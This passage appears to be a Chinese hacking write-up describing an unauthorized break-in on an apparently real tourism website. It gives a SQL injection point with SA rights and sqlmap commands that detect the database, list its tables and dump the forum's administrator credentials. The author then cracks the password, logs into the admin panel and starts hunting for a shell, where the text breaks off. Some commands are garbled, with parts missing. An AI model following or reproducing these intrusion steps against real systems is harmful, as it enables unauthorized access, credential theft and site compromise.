文档介绍:目标: /cn/?Videoid=10 此 URL 为 sa权限猪肉一块用穿山甲不能执行命令过程如下: 通过访问 .com/ 得知该站由一论坛搭建注册普通用户访问 .com/admin/ EasyJForum 论坛程序改编而来。既然有了 SA 权限的注入点那就祭出神器 sqlmap 来跑下注入点启动 BT5 ,打开 sqlmap ,输入命令 python ./ -u /cn/?Videoid=10 检测结果如图: 目标数据库为: Microsoft SQL Server2005 接着执行命令: python ./ -u /cn/?Videoid=10 – current-db – current-user 执行结果如图: 得到当前用户为: sa 数据库名: tour-2010-11-24 接下来我们列下表执行: python ./ -u /cn/?Videoid=10 – tables -D tour-2010-11-24 列出全部表如图: 过下载 EasyJForum 原程序找到论坛后台用户表以及相关用户密码字段执行命令: python ./ -u /cn/?Videoid=10 – columns -T ejf_user users-D tour-2010-11-24 -v0 在列出的用户名和密码列表中发现此用户破解后得到账户: administrator 密码: administrator 用得到的用户信息尝试登陆 in/ 成功进入,在后台浏览了一遍没有找到拿 shell 方法。不过发现了一个这个功能现在有两个方法拿 shell 了: